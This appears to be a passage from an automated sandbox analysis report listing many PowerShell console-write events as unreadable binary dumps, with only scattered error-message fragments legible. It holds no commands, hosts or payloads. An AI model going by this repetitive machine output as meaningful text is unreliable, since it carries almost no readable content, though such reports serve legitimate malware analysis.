          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......!.............................}..v....@.!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......!.............................}..v....@.!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....H.!.............................}..v......!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....H.!.............................}..v......!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v....` !.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....!!.............................}..v.....!!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....&!.....0.......................`.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....x'!.............................}..v.....'!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ..........k.... ...............................}..v.....+!.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....@,!.............................}..v.....,!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v....../.....0.......................X.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k....`./.............................}..v....../.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.1.5.............}..v....../.....0................F......$.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v....../.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k....../.............................}..v....(./.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............)".k.....I..............................}..v..... 0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................!.k.....!0.............................}..v....("0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............)".k.....I..............................}..v.....(0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................!.k.....)0.............................}..v....(*0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............)".k.....I..............................}..v.....00.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................!.k.....10.............................}..v....(20.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............)".k.....I..............................}..v.....80.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................!.k.....90.............................}..v....(:0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....@0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....A0.............................}..v....(B0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....H0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....I0.............................}..v....(J0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....P0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....Q0.............................}..v....(R0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....X0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....Y0.............................}..v....(Z0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....`0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....a0.............................}..v....(b0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....h0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....i0.............................}..v....(j0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....p0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....q0.............................}..v....(r0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....x0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....y0.............................}..v....(z0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......0.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v..... 1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....!1.............................}..v....("1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....(1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....)1.............................}..v....(*1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....01.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....11.............................}..v....(21.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....81.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....91.............................}..v....(:1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....@1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....A1.............................}..v....(B1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....H1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....I1.............................}..v....(J1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....P1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....Q1.............................}..v....(R1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............)".k.....I..............................}..v.....X1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................!.k.....Y1.............................}..v....(Z1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............)".k.....I..............................}..v.....`1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................!.k.....a1.............................}..v....(b1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............)".k.....I..............................}..v.....h1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................!.k.....i1.............................}..v....(j1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............)".k.....I..............................}..v.....p1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................!.k.....q1.............................}..v....(r1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............)".k.....I..............................}..v....xw1.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................!.k....0x1.............................}..v.....x1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............)".k.....I..............................}..v....x.1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................!.k....0.1.............................}..v......1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .a.d.a.t.a.E.x.c.e.p.t.i.o.n...............}..v......1.....0................F......".......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................!.k....x.1.............................}..v......1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............)".k.....I..............................}..v......1.....0.......................\.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................!.k....................................}..v....P.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......)".k.....I..............................}..v......1.....0................F..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v......1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v.....OC.....0.......................~.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....PC.............................}..v.... QC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.6.............}..v....0UC.....0................i......$.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....UC.............................}..v....hVC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0]C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....]C.............................}..v....h^C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0eC.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....eC.............................}..v....hfC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0mC.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....mC.............................}..v....hnC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0uC.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....uC.............................}..v....hvC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0}C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....}C.............................}..v....h~C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
